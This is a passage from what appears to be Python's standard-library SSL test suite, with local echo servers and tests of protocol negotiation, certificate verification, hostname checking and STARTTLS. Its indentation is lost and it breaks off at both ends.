def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
